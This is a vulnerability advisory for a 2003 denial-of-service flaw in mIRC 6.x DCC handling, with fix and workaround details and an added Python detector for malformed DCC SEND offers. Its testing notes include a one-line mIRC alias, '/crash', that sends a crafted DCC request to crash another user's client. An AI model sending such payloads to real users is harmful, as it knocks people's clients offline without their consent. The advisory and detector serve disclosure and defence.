mIRC Unspecified DCC Request

2003-10-13T06:29:24
ID OSVDB:2663
Type osvdb
Reporter OSVDB
Modified 2003-10-13T06:29:24

Description

Vulnerability Description

A flaw exists in version 6.x of mIRC that allows an attacker to cause a Denial of Service. This flaw exists in the way that mIRC handles certain DCC (Direct Client Connection) requests.

Solution Description

Upgrade to mIRC 6.12. This version can be obtained from http://www.mirc.com/get.html

A workaround to this issue is to type this in the chat window: /ignore -wd *

Short Description

A flaw exists in version 6.x of mIRC that allows an attacker to cause a Denial of Service. This flaw exists in the way that mIRC handles certain DCC (Direct Client Connection) requests.

Manual Testing Notes

Test the vulnerability by doing the following.

mIRC alias: /crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
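
A defensive check built around the message shape in the test alias above, as an added example that is not part of the original OSVDB entry: it parses raw IRC lines as a proxy or log reader would see them and flags DCC SEND offers with an over-long or unterminated filename or malformed numeric fields. The advisory does not state the root cause, so the 128-character threshold, the field checks (based on the conventional DCC SEND layout), and the sample nicks and hosts are assumptions.

```python
import re

# CTCP requests travel in the trailing parameter of a PRIVMSG, wrapped in \x01.
# The closing \x01 is optional so lines cut at the 512-byte IRC limit still parse.
PRIVMSG_CTCP = re.compile(
    r"^(?::(?P<src>\S+) )?PRIVMSG (?P<target>\S+) :\x01(?P<body>[^\x01]*)\x01?\s*$")
MAX_FILENAME = 128  # assumed local policy threshold, not a value from the advisory


def inspect_line(line, max_filename=MAX_FILENAME):
    """Return None unless the line is a DCC SEND offer, else a finding dict."""
    m = PRIVMSG_CTCP.match(line.rstrip("\r\n"))
    if not m:
        return None
    words = m.group("body").split(" ", 2)
    if len(words) < 2 or [w.upper() for w in words[:2]] != ["DCC", "SEND"]:
        return None
    rest = words[2] if len(words) > 2 else ""
    reasons = []
    if rest.startswith('"'):
        name, quote, tail = rest[1:].partition('"')
        if not quote:
            reasons.append("unterminated quoted filename")
    else:
        name, _, tail = rest.partition(" ")
    if len(name) > max_filename:
        reasons.append("filename longer than %d characters" % max_filename)
    # Conventional layout after the filename: <address> <port> [<size>]
    args = tail.split()
    if len(args) < 2 or not all(a.isdecimal() for a in args):
        reasons.append("missing or non-numeric address/port/size")
    elif int(args[1]) > 65535:
        reasons.append("port field out of range")
    return {"source": m.group("src"), "target": m.group("target"),
            "filename_len": len(name), "reasons": reasons}


# Constructed sample lines (not captured traffic); nicks and hosts are placeholders.
CHAT = ":alice!a@host.example PRIVMSG #chan :hello"
BENIGN = ":alice!a@host.example PRIVMSG bob :\x01DCC SEND notes.txt 3232235777 5000 1024\x01"
LONG_NAME = (':mallory!m@host.example PRIVMSG bob :\x01DCC send "%s" 0 2130706433 8192\x01'
             % ("a " * 250))
TRUNCATED = LONG_NAME[:510]  # the same offer cut to the IRC line limit (510 bytes + CRLF)

if __name__ == "__main__":
    for sample in (CHAT, BENIGN, LONG_NAME, TRUNCATED):
        print(inspect_line(sample))
```

An empty `reasons` list means the offer passed every check; any entry is a reason to drop or log the request before it reaches the client.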

References:

Vendor Specific Advisory URL
Secunia Advisory ID: 10000
Related OSVDB ID: 2665
Related OSVDB ID: 2628
ISS X-Force ID: 13427
Generic Informational URL: http://www.mirc.com